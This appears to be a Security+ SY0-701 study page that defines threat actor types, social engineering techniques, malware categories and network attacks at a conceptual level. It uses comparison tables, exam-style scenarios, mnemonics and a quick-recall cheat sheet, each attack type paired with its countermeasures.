Threat Actors & Attack Types (Security+ SY0-701)

The Threat Landscape

Security+ SY0-701 tests your ability to identify threat actors and classify attack types in scenario questions. Domain 2 (Threats, Vulnerabilities, and Mitigations) is 22% of the exam.

🎯

Exam strategy: Security+ scenario questions give you a description and ask you to identify the attack type or threat actor. Focus on the distinguishing attribute of each — motivation for threat actors, delivery mechanism for attacks.

🕵️

Threat Actors

Who Is Attacking?

Classified by motivation, capability, and resources. Understanding the why helps predict tactics, techniques, and procedures (TTPs).

Nation-state: Espionage, sabotage, APT Insider threat: Privilege abuse, revenge Hacktivist: Ideological, disruption Organized Crime: Financial gain, ransomware

🎭

Social Engineering

Manipulating Humans

Exploits psychological principles — authority, urgency, fear — rather than technical vulnerabilities. People are the primary attack surface.

Phishing: Bulk deceptive email Spear phishing: Targeted, personalized Vishing/Smishing: Phone/SMS-based Pretexting: Fabricated scenario

🦠

Malware

Malicious Software

Classified by how it spreads, what it does, and how it hides. Understanding the taxonomy is critical for Security+ scenario questions.

Ransomware: Encrypts + extorts Worm: Self-replicates, no user action Rootkit: Hides deep in OS Trojan: Disguised as legitimate

🌐

Network & App Attacks

Exploiting Infrastructure

Technical attacks targeting network protocols, authentication systems, and application input validation.

DDoS: Overwhelm with traffic On-path (MITM): Intercept comms SQL injection: Malicious DB queries Pass-the-hash: Reuse captured hashes

The SY0-701 Exam Mindset

Security+ tests application, not just memorization. A question will describe a scenario and ask "what type of attack is this?" or "which threat actor is most likely responsible?" — you need to identify the distinguishing detail that classifies it.

⚠️

Attribute framework for threat actors (SY0-701): Every threat actor is evaluated on three dimensions — Internal vs. External, Resources/Funding, and Sophistication/Capability. Additionally, SY0-701 tests 10 official motivations: data exfiltration, espionage, service disruption, blackmail, financial gain, philosophical/political beliefs, ethical, revenge, disruption/chaos, and war.

Take the Quiz →

Threat Actor Profiles & Attack Taxonomies

The details that distinguish each actor type and attack category on SY0-701 scenario questions.

🕵️ Threat Actor Profiles Who's Attacking

Nation-State / APT

Government-sponsored. Most sophisticated and well-funded. Advanced Persistent Threat — long-term, stealthy presence.

Motivation: Espionage · Sabotage · Political

Insider Threat

Current/former employee or contractor with legitimate access. Hardest to detect — bypasses perimeter controls.

Motivation: Revenge · Financial · Negligence

Hacktivist

Attacks driven by ideology or political beliefs. Targets: government, corporations, controversial organizations.

Motivation: Ideological · Political protest

Organized Crime

Financially motivated criminal groups operating at scale. Deploy ransomware, BEC fraud, credential theft, and sell stolen data on dark web markets.

Motivation: Financial gain · Blackmail

Unskilled Attacker

Uses pre-built scripts and tools without deep technical understanding. Opportunistic — scans for known vulnerabilities rather than targeting specific organizations.

Motivation: Curiosity · Notoriety · Disruption

Shadow IT

Employees or departments using unauthorized apps, cloud services, or devices without IT approval. Creates inadvertent security gaps — not always malicious in intent.

Risk: Unmanaged attack surface · Data exposure

Actor	Internal/External	Sophistication	Resources	Typical TTPs
Nation-State	External	Very High	Very High	Zero-days, supply chain attacks, long-term persistence
Insider Threat	Internal	Varies	Varies (privileged access)	Data exfiltration, sabotage, privilege abuse
Hacktivist	External	Medium	Low–Medium	DDoS, website defacement, data leaks
Organized Crime	External	Medium–High	Medium–High	Ransomware, phishing, BEC, credential theft, data brokering
Unskilled Attacker	External	Low	Low	Pre-built exploit tools, port scanning, opportunistic vulnerability exploitation
Shadow IT	Internal	Low (unintentional)	Varies	Unauthorized SaaS apps, personal cloud storage, unmanaged devices — creates unmonitored attack surface

📋

Official SY0-701 Threat Actor Categories (Objective 2.1): CompTIA's exam objectives list exactly six: Nation-State, Unskilled Attacker, Hacktivist, Insider Threat, Organized Crime, Shadow IT. Memorize this list — questions may ask you to identify which category a scenario describes. Shadow IT is unique because it is internal and typically unintentional, yet still creates real security risk.

🎯

10 Official Motivations (SY0-701 Obj. 2.1): Data exfiltration · Espionage · Service disruption · Blackmail · Financial gain · Philosophical/political beliefs · Ethical · Revenge · Disruption/chaos · War. The exam may present a motivation and ask you to match it to a threat actor type.

🎭 Social Engineering Attacks Exploiting People

Phishing

Bulk deceptive email pretending to be a trusted entity. Generic targets, mass distribution. Often uses spoofed domains.

Spear Phishing

Targeted phishing at a specific individual or organization. Uses personal details to appear legitimate. Higher success rate than generic phishing.

Whaling

Spear phishing targeting executives (CEO, CFO). High-value targets. Often requests large wire transfers or sensitive data.

Vishing

Voice phishing — phone calls impersonating IT support, banks, IRS. Uses urgency and authority to extract credentials or financial information.

Smishing

SMS-based phishing. Malicious links or requests sent via text message. Often impersonates delivery services, banks, or government agencies.

Business Email Compromise (BEC)

Impersonates a trusted executive or vendor via email. Common goal: authorize fraudulent wire transfers. Often combined with spear phishing.

Pretexting

Attacker creates a fabricated scenario (pretext) to extract information. Example: posing as IT support to get a password reset.

Baiting

Physical or digital lure. Example: USB drives left in parking lots labeled "Salary 2026" — curiosity causes victims to plug them in.

Tailgating / Piggybacking

Physically following an authorized person through a secure door. Tailgating = without consent; piggybacking = victim knowingly holds door (social pressure).

Watering Hole

Attacker compromises a website frequently visited by the target group. When victims visit the site, malware is delivered. Hard to detect.

Typosquatting

Registering domains similar to legitimate sites (e.g., "g00gle.com"). Captures traffic from users who mistype URLs. Used for credential harvesting.

Shoulder Surfing

Observing a victim entering credentials or sensitive data in person (or via camera). Physical threat, not electronic.

🧠

6 Principles of Influence (Cialdini) — social engineering exploits these:

Authority Urgency Scarcity Familiarity / Liking Social Proof Intimidation

On the exam: "The caller claimed to be the CEO and said the wire transfer was urgent" = Authority + Urgency.

🦠 Malware Types Malicious Software

Virus

Requires a host file to spread. Needs user action to execute (opening an infected file). Attaches to legitimate programs.

Worm

Self-replicates and spreads autonomously — no user action needed. Exploits network vulnerabilities. Can consume bandwidth rapidly.

Trojan

Disguised as legitimate software. Doesn't self-replicate. Creates backdoors for remote access. Often delivered via social engineering.

Ransomware

Encrypts victim's files and demands ransom for decryption key. Modern variant: double extortion — also threatens to publish stolen data.

Rootkit

Hides itself and other malware deep in the OS (kernel level). Extremely difficult to detect and remove. May require offline scanning or OS reinstall.

Keylogger

Records keystrokes silently. Captures passwords, credit cards, sensitive data. Can be hardware (USB device) or software.

Spyware

Secretly collects user data (browsing habits, credentials) and sends it to attacker. Often bundled with free software.

Botnet / C2

Network of compromised machines (bots/zombies) controlled by a command-and-control (C2) server. Used for DDoS, spam, credential stuffing.

Logic Bomb

Malicious code that triggers on a specific condition (date, event, or action). Often planted by insiders. Example: delete files if employee ID is removed.

Fileless Malware

Resides entirely in memory (RAM), leaving no file on disk. Evades traditional signature-based AV. Uses legitimate OS tools (LOLBins) to execute.

RAT (Remote Access Trojan)

Trojan that provides the attacker with remote control of the infected machine. Enables keylogging, screen capture, file access, and lateral movement.

Cryptojacker

Uses victim's CPU/GPU to mine cryptocurrency without consent. Slows system performance. May be browser-based or installed malware.

⚠️

Exam trap — Virus vs. Worm: The key distinction is spread mechanism. A virus requires a host file AND user action to spread. A worm spreads on its own by exploiting vulnerabilities — no user action needed. If the question says "spread across the network without anyone clicking anything" = worm.

🌐 Network & Application Attacks Technical Exploitation

DoS / DDoS

Denial of Service — overwhelm a target with traffic to make it unavailable. DDoS uses a distributed botnet. Amplification attacks (DNS, NTP) multiply traffic volume.

On-Path Attack (MITM)

Attacker positions between communicating parties to intercept, read, or alter traffic. Enabled by ARP poisoning, DNS spoofing, or rogue access points.

Replay Attack

Attacker captures a valid authentication token/credential and retransmits it to authenticate. Countered by timestamps, nonces, and session tokens.

SQL Injection

Injects malicious SQL commands into input fields to manipulate backend databases. Can dump, alter, or delete data. Countered by parameterized queries / prepared statements.

Cross-Site Scripting (XSS)

Injects malicious client-side scripts into web pages viewed by other users. Stored XSS persists in the database; Reflected XSS is immediate. Steals session cookies.

Pass-the-Hash

Attacker captures an NTLM password hash and uses it directly to authenticate — without knowing the plaintext password. Lateral movement technique in Windows environments.

Credential Stuffing

Uses large lists of leaked username/password pairs from one breach to try accessing other services. Exploits password reuse. Countered by MFA and breach monitoring.

DNS Poisoning / Spoofing

Corrupts a DNS cache to redirect users to attacker-controlled IP addresses. Victims believe they are visiting legitimate sites. Enables credential harvesting.

ARP Poisoning

Sends fake ARP replies to associate attacker's MAC address with a legitimate IP. Enables MITM attacks on local network segments. Countered by Dynamic ARP Inspection (DAI).

Buffer Overflow

Writes more data to a buffer than it can hold, overwriting adjacent memory. Can allow arbitrary code execution. Countered by input validation, ASLR, DEP/NX.

Brute Force / Dictionary

Systematically try all passwords (brute force) or common passwords from a list (dictionary). Countered by account lockout, MFA, and strong password policies.

Rainbow Table

Precomputed table of hash values used to reverse password hashes. Countered by salting hashes — adding a random value before hashing makes precomputed tables useless.

💡

On-path vs. MITM: CompTIA updated the terminology in SY0-701. "On-path attack" is the preferred term for what was previously called "man-in-the-middle (MITM)." Both mean the same thing — the exam may use either term.

Side-by-Side Comparison

Filter by category to highlight, or view all together. Focus on the distinguishing attributes used in exam scenarios.

Criterion	🕵️ Threat Actors	🎭 Social Engineering	🦠 Malware	🌐 Network Attacks
Primary Target	Organizations, governments, individuals — based on actor motivation	The human — bypasses technical controls entirely	Endpoints, servers, infrastructure	Network infrastructure, applications, protocols
Attack Vector	Varies by actor type and motivation	Email, phone, SMS, physical, in-person	Email attachments, drive-by downloads, USB, exploitation	Network traffic, protocols, web application input
Key Differentiator	Motivation distinguishes actor type (financial vs. political vs. ideological)	Exploits psychological principles, not technical flaws	Spread method + payload defines malware type	Protocol/layer exploited (network, app, auth)
Sophistication Level	Unskilled attacker (low) → Nation-state (very high)	Low–High (from generic phishing to BEC)	Low (basic virus) → High (fileless, rootkit)	Moderate (DDoS) → High (pass-the-hash, zero-day)
Hardest to Detect	Nation-state APT (persistent, slow, stealthy)	Watering hole + pretexting (no suspicious email)	Fileless malware + rootkit (no disk artifacts)	On-path / ARP poisoning (passive eavesdropping)
Primary Countermeasure	Threat intelligence, zero trust, insider threat programs	Security awareness training, MFA, email filtering	EDR/AV, application allowlisting, patch management	Firewalls, IDS/IPS, input validation, salting/hashing
Exam Keyword	"government-sponsored," "ideological," "disgruntled employee"	"urgent," "CEO email," "USB in parking lot," "phone call"	"encrypts," "no user action needed," "hides in kernel"	"intercept," "overwhelm," "inject," "replay," "hash"
Notable Example	Nation-state: SolarWinds supply chain attack (APT)	BEC: $47M wire fraud via spoofed CEO email (2015)	Ransomware: Colonial Pipeline — DarkSide group (2021)	DDoS: Dyn DNS attack via Mirai botnet (2016)

Exam-Style Vignettes

Read each scenario and identify the attack type before revealing the breakdown — just like SY0-701 scenario questions.

🎭 Social EngineeringThe "Urgent CEO" Email

"An employee in accounting receives an email appearing to be from the CEO. The email says: 'I'm in a board meeting and can't talk — I need you to urgently wire $85,000 to a new vendor by 3pm today or we lose the contract. Don't discuss this with anyone.' The sender's domain is 'acmec0rp.com' instead of 'acmecorp.com'."

Attack TypeBusiness Email Compromise (BEC) — a form of spear phishing targeting financial processes

Principles ExploitedAuthority (CEO), urgency (3pm deadline), scarcity (lose the contract), isolation ("don't discuss")

IndicatorTyposquatted domain: "acmec0rp.com" — zero substituted for letter 'o'

CountermeasureOut-of-band verification for wire transfers, DMARC/DKIM email authentication, security awareness training

🦠 MalwareFiles Disappeared, Ransom Note Appeared

"A hospital's file server shows all patient records now have a '.locked' extension and cannot be opened. A text file on the desktop reads: 'Your files are encrypted. Pay 50 BTC to recover them. Additionally, we have exfiltrated 3TB of patient data and will publish it if payment is not received within 72 hours.'"

Malware TypeRansomware — specifically double extortion ransomware (encrypt + threaten to publish)

Threat ActorMost likely cybercriminal / organized crime (financial motivation, healthcare is high-value target)

Key Term"Double extortion" = encrypt files AND exfiltrate data as second leverage point

CountermeasureImmutable offsite backups, network segmentation, EDR, incident response plan

🌐 Network AttackThe Compromised Coffee Shop

"A security analyst notices that all laptops on the corporate guest Wi-Fi are sending traffic through an unfamiliar MAC address. ARP tables show a single MAC mapped to multiple IP addresses. Users on the network later report their credentials were used to access corporate systems from overseas IP addresses."

Attack TypeARP poisoning enabling an on-path (MITM) attack — attacker redirected all traffic through their device

IndicatorSingle MAC address mapped to multiple IPs in the ARP table = ARP poisoning signature

Follow-on AttackCredential theft from intercepted traffic → credential stuffing or direct unauthorized access

CountermeasureDynamic ARP Inspection (DAI), VPN enforcement on all networks, 802.1X port authentication

🕵️ Threat ActorMonths in the Network Undetected

"A forensic investigation reveals that an attacker had been inside a defense contractor's network for 14 months before detection. They used zero-day exploits, moved laterally using legitimate admin credentials, exfiltrated classified project documents slowly over encrypted channels, and left no obvious malware signatures."

Threat ActorNation-state / Advanced Persistent Threat (APT) — long dwell time, sophisticated TTPs, zero-days, no financial demand

Key IndicatorsZero-day use, 14-month dwell time, slow exfiltration, use of legitimate tools (living off the land)

MotivationEspionage — classified defense information has political/military value, not financial

CountermeasureZero trust architecture, behavioral analytics (UEBA), threat hunting, privileged access management

⚠️

Common exam traps: (1) "USB dropped in parking lot" = baiting (not just social engineering generically). (2) "Spread across network without user interaction" = worm (not virus). (3) "Used captured hash to authenticate" = pass-the-hash (not brute force — password was never cracked). (4) "Government-sponsored, long-term, stealthy" = nation-state APT (not hacktivist — hacktivists want visibility).

Practice Quiz

10 scenario-based questions with per-category breakdown — just like the real SY0-701 exam format.

Question 1 of 10

Threat Actors

—

Social Engineering

—

Malware

—

Network Attacks

—

Threat Identifier Tool

Answer 3 questions to identify the attack type or threat actor in your scenario — built around real SY0-701 question patterns.

What is the primary attack vector in the scenario?

Where did the attack originate — email/phone, installed software, or the network itself?

How did the attacker make contact?

The delivery method is the key differentiator for social engineering sub-types.

Was the email targeted at a specific person or sent broadly?

What was the apparent goal of the targeted email?

What did the physical attack involve?

What is the primary behavior of the malware?

How did the malware spread?

What is the primary effect of the network/application attack?

What is the attacker's apparent motivation?

How sophisticated is the attack?

Memory Hooks & Mnemonics

Click each card to flip it and reveal the mnemonic.

👆 Tap a card to flip

🐋

Social Engineering

Phishing → Spear Phishing → Whaling: what's the difference?

Generic → Targeted → Executive

Phishing = anyone. Spear = specific person. Whaling = big fish (exec/CEO). The more targeted, the more personalized, the more dangerous.

🦠

Malware

Virus vs. Worm — what's the key difference?

Virus needs a HOST + a CLICK. Worm needs NEITHER.

Virus = attaches to a file, needs user to open it. Worm = spreads on its own by exploiting vulnerabilities. "No user action" on the exam = worm.

🕵️

Threat Actors

How do you remember nation-state vs. hacktivist?

Nation-state HIDES. Hacktivists ANNOUNCE.

Nation-state APTs want to stay undetected for months/years (espionage). Hacktivists want publicity — they deface websites and leak data to make a point. Visibility is the tell.

🔑

Network Attacks

Pass-the-hash vs. brute force vs. rainbow table?

Brute: TRY all. Rainbow: LOOK UP. Pass-the-hash: USE the hash directly.

Pass-the-hash never cracks the password — it authenticates using the captured hash value itself. If the exam says "without knowing the plaintext password" = pass-the-hash.

🎭

Social Engineering

What 6 psychological principles do attackers exploit?

AU·S·FIS: Authority, Urgency, Scarcity, Familiarity, Intimidation, Social proof

"This is your BANK (authority) — your account will be CLOSED (urgency) unless you verify NOW (scarcity)." Two or more combined = stronger attack.

💣

Malware

What is a logic bomb and who usually plants one?

"Time bomb planted by an insider"

Logic bomb = malicious code that triggers on a condition (date, event). Who plants it? Disgruntled insiders. Exam clue: "code set to execute when the employee's account was deleted" = logic bomb.

🔒

Malware

What is double extortion ransomware?

Encrypt + Threaten to Leak = Double Extortion

Traditional ransomware only encrypts. Double extortion also exfiltrates data and threatens to publish it. Backups alone don't solve it — the data exposure threat remains.

🌊

Network Attacks

Watering hole vs. typosquatting — what's the difference?

Watering hole = REAL site you hack. Typosquatting = FAKE site you register.

Watering hole: compromise a legitimate website the target visits. Typosquatting: register "g00gle.com" to catch typo traffic. Both deliver victims to attacker-controlled content.

SY0-701 Quick-Recall Cheat Sheet

If the exam says…	Key detail	Answer
"Government-sponsored," "zero-day," "14-month dwell time"	Long-term, stealthy, political	Nation-state / APT
"Disgruntled employee," "planted code," "deleted records on last day"	Internal + privileged access	Insider Threat
"No user action needed," "spread across network automatically"	Self-replication	Worm
"Encrypts files," "ransom note," "also exfiltrated data"	Encrypt + leak threat	Double Extortion Ransomware
"Hides itself," "AV finds nothing," "kernel-level"	Deep OS hiding	Rootkit
"Captured hash," "authenticated without cracking password"	Uses hash directly	Pass-the-Hash
"Flooded with traffic from thousands of IPs"	Distributed sources	DDoS (Botnet)
"USB left in parking lot," "labeled Payroll"	Physical lure	Baiting
"CEO email, urgent wire transfer, slightly wrong domain"	Financial fraud via email	BEC / Spear Phishing
"Phone call, claimed to be IT support, asked for password"	Voice + authority	Vishing + Pretexting
"Opportunistic," "downloaded tools," "ran a script," "no specific target"	Official SY0-701 term	Unskilled Attacker
"Ransomware group," "organized," "financial motive," "RaaS"	Official SY0-701 term	Organized Crime
"Unauthorized Dropbox," "personal cloud storage," "unapproved SaaS"	Internal, unintentional risk	Shadow IT

Threat Actors & Attack Types
Who · Social Engineering · Malware · Network Attacks

Who Is Attacking?

Manipulating Humans

Malicious Software

Exploiting Infrastructure

The SY0-701 Exam Mindset

🕵️ Threat Actor Profiles Who's Attacking

Nation-State / APT

Insider Threat

Hacktivist

Organized Crime

Unskilled Attacker

Shadow IT

🎭 Social Engineering Attacks Exploiting People

🦠 Malware Types Malicious Software

🌐 Network & Application Attacks Technical Exploitation

SY0-701 Quick-Recall Cheat Sheet

Ready to Pass Security+?
Get Everything You Need in One Place.

Threat Actors & Attack TypesWho · Social Engineering · Malware · Network Attacks

Who Is Attacking?

Manipulating Humans

Malicious Software

Exploiting Infrastructure

The SY0-701 Exam Mindset

🕵️ Threat Actor Profiles Who's Attacking

Nation-State / APT

Insider Threat

Hacktivist

Organized Crime

Unskilled Attacker

Shadow IT

🎭 Social Engineering Attacks Exploiting People

🦠 Malware Types Malicious Software

🌐 Network & Application Attacks Technical Exploitation

SY0-701 Quick-Recall Cheat Sheet

Ready to Pass Security+?Get Everything You Need in One Place.

Threat Actors & Attack Types
Who · Social Engineering · Malware · Network Attacks

Ready to Pass Security+?
Get Everything You Need in One Place.